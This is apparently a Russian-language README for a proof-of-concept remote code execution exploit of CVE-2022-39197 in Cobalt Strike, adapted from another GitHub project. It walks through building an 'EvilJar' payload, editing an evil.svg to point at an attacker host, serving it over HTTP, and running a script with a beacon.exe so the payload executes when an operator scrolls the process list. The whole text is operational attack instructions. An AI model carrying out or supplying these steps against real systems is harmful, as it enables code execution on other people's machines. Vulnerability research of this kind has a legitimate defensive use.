
CVE-2022-39197 RCE POC
Этот проект был изменён на основе проекта @its-arun https://github.com/its-arun/CVE-2022-39197
Когда я тестировал скрипт, я обнаружил, что frida-скрипт не мог запросить данные в обычном порядке. Метод изменения frida-скрипта для изменения имени процесса.
Спасибо мастеру @Kai5174 за его вклад в метод эксплуатации.
1、Отредактируйте команду, выполняемую с вашей полезной нагрузкой, в EvilJar/src/main/java/Exploit.java, сейчас она может только открыть калькулятор.
2、Соберите с помощью jar mvn clean compile assembly:single
4、Переместите EvilJar-1.0-jar-with-dependencies.jar из EvilJar/target/ в папку serve/
5、Отредактируйте serve\evil.svg замените [attacker]
6、Запустите сервер с помощью python3 -m http.server 8080
7、Сгенерируйте beacon.exe с версией C2 меньше или равной 4.7
8、Вам нужно выполнить py-скрипт на Windows, чтобы выйти в сеть, и принять контрмеры, когда клиент обращается к списку процессов и видит процесс beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
Полезная нагрузка будет запущена, как только пользователь прокрутит список процессов.
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Есть отличный глубокий анализ этой уязвимости https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
Модифицировано https://github.com/its-arun/CVE-2022-39197